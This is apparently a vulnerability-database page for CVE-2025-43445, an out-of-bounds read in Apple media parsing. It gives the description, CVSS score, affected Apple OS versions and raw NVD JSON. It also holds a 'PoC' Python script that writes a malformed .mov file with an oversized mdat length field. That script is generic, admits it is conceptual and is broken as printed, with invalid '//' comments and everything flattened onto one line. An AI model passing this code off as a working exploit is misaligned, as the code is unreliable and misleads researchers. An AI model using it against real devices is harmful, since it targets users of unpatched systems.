Security Vulnerability Report
中文
CVE-2025-43445 CVSS 4.3 MEDIUM

CVE-2025-43445

Published: 2025-11-04 02:15:50
Last Modified: 2026-04-02 19:20:48
Source: [email protected]

Description

An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Sequoia 15.7.2, macOS Sonoma 14.8.2, macOS Tahoe 26.1, tvOS 26.1, visionOS 26.1, watchOS 26.1. Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE
Apple iOS < 18.7.2
Apple iPadOS < 18.7.2
Apple iOS < 26.1
Apple iPadOS < 26.1
Apple macOS Sequoia < 15.7.2
Apple macOS Sonoma < 14.8.2
Apple macOS Tahoe < 26.1
Apple tvOS < 26.1
Apple visionOS < 26.1
Apple watchOS < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-43445 PoC - Malicious Media File Trigger // This PoC demonstrates the structure needed to trigger the OOB read // Note: Actual exploit requires specific media file format manipulation import struct import os def create_poc_media_file(filename): """ Generate a malicious media file that may trigger CVE-2025-43445 The vulnerability exists in Apple's media file parsing components """ # Media file header with malformed data # This is a conceptual PoC - actual exploitation requires # specific media format knowledge and file structure manipulation poc_data = bytearray() # Malformed media header that triggers OOB read # Attackers craft specific byte sequences that bypass validation poc_data.extend(b'\x00\x00\x00\x20') # Size field poc_data.extend(b'ftyp') # File type marker poc_data.extend(b'XXXX') # Brand identifier poc_data.extend(b'\x00\x00\x00\x00') # Minor version # Crafted metadata chunks with oversized length fields # This may cause the parser to read beyond allocated buffer poc_data.extend(b'mdat') # Media data box poc_data.extend(struct.pack('>I', 0xFFFFFFFF)) # Oversized length poc_data.extend(b'A' * 1000) # Data that triggers OOB read # Save the PoC file with open(filename, 'wb') as f: f.write(poc_data) print(f"PoC file created: {filename}") print("Warning: This file is for educational and research purposes only") if __name__ == "__main__": create_poc_media_file("CVE-2025-43445.mov")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43445", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:50.260", "lastModified": "2026-04-02T19:20:48.137", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Sequoia 15.7.2, macOS Sonoma 14.8.2, macOS Tahoe 26.1, tvOS 26.1, visionOS 26.1, watchOS 26.1. Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "6D51AEDC-9086-4010-B3BF-C652D65D09C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "3981A7BE-BC98-4C6F-AE38-D68839368925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.8.2", "matchCriteriaId": "84A2783A-5B53-4DAB-80C4-8D62E332802A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.2", "matchCriteriaId": "4BE8199E-63D1-496C-B107-52853CFC2311"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "290E0D29-CB5B-45A7-9FE3-FD2030B1D1A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "7DFD3616-65CA-4E5C-849C-3C20ACBCB610"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "9F9D7F76-13FB-407C-94E5-221B93021568"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125632", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125633", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125635", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125636", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125637", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125638", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125639", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.